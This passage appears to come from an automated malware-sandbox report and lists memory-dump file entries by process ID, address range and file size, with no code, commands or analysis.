memory/4436-316-0x000000001B6B0000-0x000000001B6B2000-memory.dmpFilesize
8KB
-
memory/4436-285-0x0000000000000000-mapping.dmp
-
memory/4436-296-0x0000000000980000-0x0000000000981000-memory.dmpFilesize
4KB
-
memory/4436-305-0x0000000000EB0000-0x0000000000EB1000-memory.dmpFilesize
4KB
-
memory/4436-311-0x00000000010F0000-0x0000000001124000-memory.dmpFilesize
208KB
-
memory/4504-221-0x0000000000550000-0x000000000069A000-memory.dmpFilesize
1.3MB
-
memory/4504-192-0x0000000000000000-mapping.dmp
-
memory/4504-208-0x0000000000550000-0x000000000069A000-memory.dmpFilesize
1.3MB
-
memory/4504-259-0x0000000000000000-mapping.dmp
-
memory/4536-235-0x0000000005260000-0x0000000005261000-memory.dmpFilesize
4KB
-
memory/4536-228-0x0000000005200000-0x0000000005201000-memory.dmpFilesize
4KB
-
memory/4536-243-0x0000000005160000-0x0000000005766000-memory.dmpFilesize
6.0MB
-
memory/4536-246-0x00000000052A0000-0x00000000052A1000-memory.dmpFilesize
4KB
-
memory/4536-196-0x0000000000000000-mapping.dmp
-
memory/4536-227-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/4536-220-0x00000000008D0000-0x00000000008D1000-memory.dmpFilesize
4KB
-
memory/4552-197-0x0000000000000000-mapping.dmp
-
memory/4560-370-0x000001DB36FA0000-0x000001DB3700E000-memory.dmpFilesize
440KB
-
memory/4560-255-0x0000000000000000-mapping.dmp
-
memory/4560-371-0x000001DB37010000-0x000001DB370DF000-memory.dmpFilesize
828KB
-
memory/4616-249-0x0000000005910000-0x0000000005911000-memory.dmpFilesize
4KB
-
memory/4616-233-0x0000000000340000-0x0000000000341000-memory.dmpFilesize
4KB
-
memory/4616-203-0x0000000000000000-mapping.dmp
-
memory/4616-244-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/4616-242-0x00000000776B0000-0x000000007783E000-memory.dmpFilesize
1.6MB
-
memory/4696-207-0x0000000000000000-mapping.dmp
-
memory/5028-309-0x0000000000EF0000-0x0000000000EF1000-memory.dmpFilesize
4KB
-
memory/5028-340-0x0000000005820000-0x0000000005821000-memory.dmpFilesize
4KB
-
memory/5028-290-0x0000000000000000-mapping.dmp
-
memory/5064-408-0x0000000000400000-0x0000000000945000-memory.dmpFilesize
5.3MB
-
memory/5064-406-0x0000000000C30000-0x0000000000CC3000-memory.dmpFilesize
588KB
-
memory/5064-365-0x0000000000000000-mapping.dmp
-
memory/5128-455-0x0000000000000000-mapping.dmp
-
memory/5232-400-0x0000000000000000-mapping.dmp
-
memory/5272-402-0x0000000000000000-mapping.dmp
-
memory/5364-459-0x0000000000000000-mapping.dmp
-
memory/5408-413-0x0000000000000000-mapping.dmp
-
memory/5440-415-0x0000000000000000-mapping.dmp
-
memory/5468-416-0x0000000000000000-mapping.dmp
-
memory/5520-418-0x0000000000000000-mapping.dmp
-
memory/5584-420-0x0000000000000000-mapping.dmp
-
memory/5632-422-0x0000000000000000-mapping.dmp
-
memory/5672-423-0x0000000000000000-mapping.dmp
-
memory/5724-425-0x000000000041047E-mapping.dmp
-
memory/5896-446-0x0000000000000000-mapping.dmp
-
memory/6060-502-0x0000000000000000-mapping.dmp
-
memory/6088-453-0x0000000000000000-mapping.dmp